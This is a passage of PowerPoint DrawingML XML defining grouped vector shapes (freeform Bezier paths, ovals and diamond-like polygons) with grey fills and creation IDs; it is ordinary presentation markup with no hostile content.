                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="155"/>
                          <a:pt x="43" y="156"/>
                          <a:pt x="43" y="157"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="180"/>
                          <a:pt x="84" y="177"/>
                          <a:pt x="84" y="157"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="84" y="142"/>
                          <a:pt x="85" y="80"/>
                          <a:pt x="85" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="74"/>
                          <a:pt x="87" y="70"/>
                          <a:pt x="89" y="69"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="91" y="69"/>
                          <a:pt x="136" y="57"/>
                          <a:pt x="141" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="153" y="52"/>
                          <a:pt x="159" y="47"/>
                          <a:pt x="159" y="25"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="8"/>
                          <a:pt x="159" y="8"/>
                          <a:pt x="159" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="7"/>
                          <a:pt x="159" y="7"/>
                          <a:pt x="159" y="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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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21" name="Freeform 1727">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7A0112D-4900-4AE5-A60C-A18859AB49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089" y="1378"/>
                    <a:ext cx="119" cy="71"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 75 w 91"/>
                      <a:gd name="T1" fmla="*/ 0 h 54"/>
                      <a:gd name="T2" fmla="*/ 28 w 91"/>
                      <a:gd name="T3" fmla="*/ 14 h 54"/>
                      <a:gd name="T4" fmla="*/ 40 w 91"/>
                      <a:gd name="T5" fmla="*/ 46 h 54"/>
                      <a:gd name="T6" fmla="*/ 91 w 91"/>
                      <a:gd name="T7" fmla="*/ 32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1" h="54">
                        <a:moveTo>
                          <a:pt x="75" y="0"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="61" y="4"/>
                          <a:pt x="45" y="8"/>
                          <a:pt x="28" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="22"/>
                          <a:pt x="17" y="54"/>
                          <a:pt x="40" y="46"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="44"/>
                          <a:pt x="66" y="38"/>
                          <a:pt x="91" y="32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22" name="Oval 1728">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{775DCBDB-4164-4423-B5B5-2F00188BFC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gray">
                  <a:xfrm flipH="1">
                    <a:off x="2069" y="1129"/>
                    <a:ext cx="105" cy="105"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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85" name="Group 1729">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2ABC9C2-10E5-425C-B92E-62BD649DAF4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88" y="2907"/>
                  <a:ext cx="1084" cy="517"/>
                  <a:chOff x="1938" y="2733"/>
                  <a:chExt cx="1084" cy="517"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="2702" name="Group 1730">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DECD16-1EA9-4221-9721-1935F81E9AD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938" y="2733"/>
                    <a:ext cx="434" cy="341"/>
                    <a:chOff x="2588" y="2910"/>
                    <a:chExt cx="434" cy="341"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2715" name="Freeform 1731">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86C5AC75-9EBA-49C6-9A8C-25207B402FB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588" y="2910"/>
                      <a:ext cx="434" cy="117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16" name="Freeform 1732">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{033991D2-B736-488E-924B-C8DBBA9611B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805" y="2969"/>
                      <a:ext cx="217" cy="282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303030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17" name="Freeform 1733">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F178083-F433-405D-90BD-B6A10517609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588" y="2969"/>
                      <a:ext cx="217" cy="282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703" name="Group 1734">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{244E8202-5A51-4F1B-900B-4ABBE28CC0B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155" y="2792"/>
                    <a:ext cx="434" cy="341"/>
                    <a:chOff x="2588" y="2910"/>
                    <a:chExt cx="434" cy="341"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2712" name="Freeform 1735">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56382DCB-F197-4CED-9D5D-89244458CED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588" y="2910"/>
                      <a:ext cx="434" cy="117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13" name="Freeform 1736">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5157170-93FD-43E1-9E11-AA38BF627F4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805" y="2969"/>
                      <a:ext cx="217" cy="282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303030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14" name="Freeform 1737">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE250F25-260A-449E-BA6E-1AA152E68B1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588" y="2969"/>
                      <a:ext cx="217" cy="282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704" name="Group 1738">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB145EDC-A0DE-4619-B967-90355741D90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371" y="2850"/>
                    <a:ext cx="434" cy="341"/>
                    <a:chOff x="2588" y="2910"/>
                    <a:chExt cx="434" cy="341"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2709" name="Freeform 1739">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{515C5DF2-2676-472D-9A61-2522F2D9B4F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588" y="2910"/>
                      <a:ext cx="434" cy="117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10" name="Freeform 1740">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BBFF7A-3044-4BBE-963C-7D9D0ADBAED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805" y="2969"/>
                      <a:ext cx="217" cy="282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303030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11" name="Freeform 1741">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD0C1398-F520-4518-B60F-F3A37A5BDAF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588" y="2969"/>
                      <a:ext cx="217" cy="282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705" name="Group 1742">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F462AA8-0B2E-48E1-B43A-5BDF47E45F7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588" y="2909"/>
                    <a:ext cx="434" cy="341"/>
                    <a:chOff x="2588" y="2910"/>
                    <a:chExt cx="434" cy="341"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2706" name="Freeform 1743">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E8D10A6-2B6D-4772-A938-5C9BE9B6C5D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588" y="2910"/>
                      <a:ext cx="434" cy="117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07" name="Freeform 1744">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69B70F8E-6682-4090-A8DA-E1F663087A4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805" y="2969"/>
                      <a:ext cx="217" cy="282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303030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08" name="Freeform 1745">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{349D73D2-7F90-44F3-B304-0F82900B156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588" y="2969"/>
                      <a:ext cx="217" cy="282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2686" name="Group 1746">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B88DBA0C-7B69-4EBE-83C5-0FF962C5A2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74" y="2970"/>
                  <a:ext cx="540" cy="155"/>
                  <a:chOff x="1703" y="3006"/>
                  <a:chExt cx="540" cy="155"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="2687" name="Group 1747">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00C7465C-CDD9-4CF1-BAC0-33AE063E786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3" y="3006"/>
                    <a:ext cx="270" cy="83"/>
                    <a:chOff x="1703" y="3004"/>
                    <a:chExt cx="270" cy="83"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2698" name="Freeform 1748">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFBAA3A0-7BA5-44D5-BBB1-389D1B20E9C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703" y="3004"/>
                      <a:ext cx="270" cy="73"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 25173"/>
                        <a:gd name="T1" fmla="*/ 3378 h 6756"/>
                        <a:gd name="T2" fmla="*/ 12585 w 25173"/>
                        <a:gd name="T3" fmla="*/ 0 h 6756"/>
                        <a:gd name="T4" fmla="*/ 25173 w 25173"/>
                        <a:gd name="T5" fmla="*/ 3378 h 6756"/>
                        <a:gd name="T6" fmla="*/ 12585 w 25173"/>
                        <a:gd name="T7" fmla="*/ 6756 h 6756"/>
                        <a:gd name="T8" fmla="*/ 0 w 25173"/>
                        <a:gd name="T9" fmla="*/ 3378 h 675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5173" h="6756">
                          <a:moveTo>
                            <a:pt x="0" y="3378"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="12585" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="25173" y="3378"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12585" y="6756"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3378"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="969696"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="969696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99" name="Freeform 1749">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F6C6D29-1EA4-41EC-9A8F-43DF624BC2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838" y="3040"/>
                      <a:ext cx="135" cy="47"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 12588"/>
                        <a:gd name="T1" fmla="*/ 3378 h 4342"/>
                        <a:gd name="T2" fmla="*/ 0 w 12588"/>
                        <a:gd name="T3" fmla="*/ 4342 h 4342"/>
                        <a:gd name="T4" fmla="*/ 12588 w 12588"/>
                        <a:gd name="T5" fmla="*/ 964 h 4342"/>
                        <a:gd name="T6" fmla="*/ 12588 w 12588"/>
                        <a:gd name="T7" fmla="*/ 0 h 4342"/>
                        <a:gd name="T8" fmla="*/ 0 w 12588"/>
                        <a:gd name="T9" fmla="*/ 3378 h 434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588" h="4342">
                          <a:moveTo>
                            <a:pt x="0" y="3378"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="4342"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12588" y="964"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12588" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3378"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="808080"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="80808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00" name="Freeform 1750">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB36167F-940F-417D-A04D-635CDE8F776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703" y="3040"/>
                      <a:ext cx="135" cy="47"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 12585 w 12585"/>
                        <a:gd name="T1" fmla="*/ 4342 h 4342"/>
                        <a:gd name="T2" fmla="*/ 0 w 12585"/>
                        <a:gd name="T3" fmla="*/ 964 h 4342"/>
                        <a:gd name="T4" fmla="*/ 0 w 12585"/>
                        <a:gd name="T5" fmla="*/ 0 h 4342"/>
                        <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                        <a:gd name="T7" fmla="*/ 3378 h 4342"/>
                        <a:gd name="T8" fmla="*/ 12585 w 12585"/>
                        <a:gd name="T9" fmla="*/ 4342 h 434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585" h="4342">
                          <a:moveTo>
                            <a:pt x="12585" y="4342"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="964"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12585" y="3378"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12585" y="4342"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="C0C0C0"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="C0C0C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01" name="Freeform 1751">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C67A332-0746-43C9-B592-03FBC67465F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741" y="3016"/>
                      <a:ext cx="183" cy="49"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 17020"/>
                        <a:gd name="T1" fmla="*/ 1711 h 4567"/>
                        <a:gd name="T2" fmla="*/ 10647 w 17020"/>
                        <a:gd name="T3" fmla="*/ 4567 h 4567"/>
                        <a:gd name="T4" fmla="*/ 17020 w 17020"/>
                        <a:gd name="T5" fmla="*/ 2859 h 4567"/>
                        <a:gd name="T6" fmla="*/ 6371 w 17020"/>
                        <a:gd name="T7" fmla="*/ 0 h 4567"/>
                        <a:gd name="T8" fmla="*/ 0 w 17020"/>
                        <a:gd name="T9" fmla="*/ 1711 h 456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7020" h="4567">
                          <a:moveTo>
                            <a:pt x="0" y="1711"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="10647" y="4567"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="17020" y="2859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="6371" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1711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6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="C0C0C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688" name="Group 1752">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{364D8272-3C54-493D-9714-AA3EB38D6F4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838" y="3042"/>
                    <a:ext cx="270" cy="83"/>
                    <a:chOff x="1703" y="3004"/>
                    <a:chExt cx="270" cy="83"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2694" name="Freeform 1753">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D90F151E-54C9-45B4-83AF-8BE6D02438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703" y="3004"/>
                      <a:ext cx="270" cy="73"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 25173"/>
                        <a:gd name="T1" fmla="*/ 3378 h 6756"/>
                        <a:gd name="T2" fmla="*/ 12585 w 25173"/>
                        <a:gd name="T3" fmla="*/ 0 h 6756"/>
                        <a:gd name="T4" fmla="*/ 25173 w 25173"/>
                        <a:gd name="T5" fmla="*/ 3378 h 6756"/>
                        <a:gd name="T6" fmla="*/ 12585 w 25173"/>
                        <a:gd name="T7" fmla="*/ 6756 h 6756"/>
                        <a:gd name="T8" fmla="*/ 0 w 25173"/>
                        <a:gd name="T9" fmla="*/ 3378 h 675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5173" h="6756">
                          <a:moveTo>
                            <a:pt x="0" y="3378"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="12585" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="25173" y="3378"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12585" y="6756"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3378"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="969696"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="969696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95" name="Freeform 1754">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F600EE68-C572-45A5-B94F-23AD34322F7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838" y="3040"/>
                      <a:ext cx="135" cy="47"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 12588"/>
                        <a:gd name="T1" fmla="*/ 3378 h 4342"/>
                        <a:gd name="T2" fmla="*/ 0 w 12588"/>
                        <a:gd name="T3" fmla="*/ 4342 h 4342"/>
                        <a:gd name="T4" fmla="*/ 12588 w 12588"/>
                        <a:gd name="T5" fmla="*/ 964 h 4342"/>
                        <a:gd name="T6" fmla="*/ 12588 w 12588"/>
                        <a:gd name="T7" fmla="*/ 0 h 4342"/>
                        <a:gd name="T8" fmla="*/ 0 w 12588"/>
                        <a:gd name="T9" fmla="*/ 3378 h 434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588" h="4342">
                          <a:moveTo>
                            <a:pt x="0" y="3378"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="4342"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12588" y="964"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12588" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3378"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="808080"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="80808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96" name="Freeform 1755">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61BCFD52-8CEB-4327-9A0A-1D5958105A9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703" y="3040"/>
                      <a:ext cx="135" cy="47"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 12585 w 12585"/>
                        <a:gd name="T1" fmla="*/ 4342 h 4342"/>
                        <a:gd name="T2" fmla="*/ 0 w 12585"/>
                        <a:gd name="T3" fmla="*/ 964 h 4342"/>
                        <a:gd name="T4" fmla="*/ 0 w 12585"/>
                        <a:gd name="T5" fmla="*/ 0 h 4342"/>
                        <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                        <a:gd name="T7" fmla="*/ 3378 h 4342"/>
                        <a:gd name="T8" fmla="*/ 12585 w 12585"/>
                        <a:gd name="T9" fmla="*/ 4342 h 434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585" h="4342">
                          <a:moveTo>
                            <a:pt x="12585" y="4342"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="964"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12585" y="3378"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12585" y="4342"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="C0C0C0"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="C0C0C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97" name="Freeform 1756">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EA0132A-F019-4B4E-BF47-73C02EAFA40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741" y="3016"/>
                      <a:ext cx="183" cy="49"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 17020"/>
                        <a:gd name="T1" fmla="*/ 1711 h 4567"/>
                        <a:gd name="T2" fmla="*/ 10647 w 17020"/>
                        <a:gd name="T3" fmla="*/ 4567 h 4567"/>
                        <a:gd name="T4" fmla="*/ 17020 w 17020"/>
                        <a:gd name="T5" fmla="*/ 2859 h 4567"/>
                        <a:gd name="T6" fmla="*/ 6371 w 17020"/>
                        <a:gd name="T7" fmla="*/ 0 h 4567"/>
                        <a:gd name="T8" fmla="*/ 0 w 17020"/>
                        <a:gd name="T9" fmla="*/ 1711 h 456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7020" h="4567">
                          <a:moveTo>
                            <a:pt x="0" y="1711"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="10647" y="4567"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="17020" y="2859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="6371" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1711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6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="C0C0C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689" name="Group 1757">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE804C4C-381F-46ED-A191-7F2A4E01051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973" y="3078"/>
                    <a:ext cx="270" cy="83"/>
                    <a:chOff x="1703" y="3004"/>
                    <a:chExt cx="270" cy="83"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2690" name="Freeform 1758">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CE2A3DE-5A2F-4CA9-946A-27CD6BE490E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703" y="3004"/>
                      <a:ext cx="270" cy="73"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 25173"/>
                        <a:gd name="T1" fmla="*/ 3378 h 6756"/>
                        <a:gd name="T2" fmla="*/ 12585 w 25173"/>
                        <a:gd name="T3" fmla="*/ 0 h 6756"/>
                        <a:gd name="T4" fmla="*/ 25173 w 25173"/>
                        <a:gd name="T5" fmla="*/ 3378 h 6756"/>
                        <a:gd name="T6" fmla="*/ 12585 w 25173"/>
                        <a:gd name="T7" fmla="*/ 6756 h 6756"/>
                        <a:gd name="T8" fmla="*/ 0 w 25173"/>
                        <a:gd name="T9" fmla="*/ 3378 h 675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5173" h="6756">
                          <a:moveTo>
                            <a:pt x="0" y="3378"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="12585" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="25173" y="3378"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12585" y="6756"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3378"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="969696"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="969696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91" name="Freeform 1759">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41742E9A-AB71-4C1B-88FE-2484B51174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838" y="3040"/>
                      <a:ext cx="135" cy="47"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 12588"/>
                        <a:gd name="T1" fmla="*/ 3378 h 4342"/>
                        <a:gd name="T2" fmla="*/ 0 w 12588"/>
                        <a:gd name="T3" fmla="*/ 4342 h 4342"/>
                        <a:gd name="T4" fmla="*/ 12588 w 12588"/>
                        <a:gd name="T5" fmla="*/ 964 h 4342"/>
                        <a:gd name="T6" fmla="*/ 12588 w 12588"/>
                        <a:gd name="T7" fmla="*/ 0 h 4342"/>
                        <a:gd name="T8" fmla="*/ 0 w 12588"/>
                        <a:gd name="T9" fmla="*/ 3378 h 434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588" h="4342">
                          <a:moveTo>
                            <a:pt x="0" y="3378"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="4342"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12588" y="964"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12588" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3378"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="808080"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="80808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92" name="Freeform 1760">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F83B83B5-3B9C-4414-A984-B9225DB2BCB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703" y="3040"/>
                      <a:ext cx="135" cy="47"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 12585 w 12585"/>
                        <a:gd name="T1" fmla="*/ 4342 h 4342"/>
                        <a:gd name="T2" fmla="*/ 0 w 12585"/>
                        <a:gd name="T3" fmla="*/ 964 h 4342"/>
                        <a:gd name="T4" fmla="*/ 0 w 12585"/>
                        <a:gd name="T5" fmla="*/ 0 h 4342"/>
                        <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                        <a:gd name="T7" fmla="*/ 3378 h 4342"/>
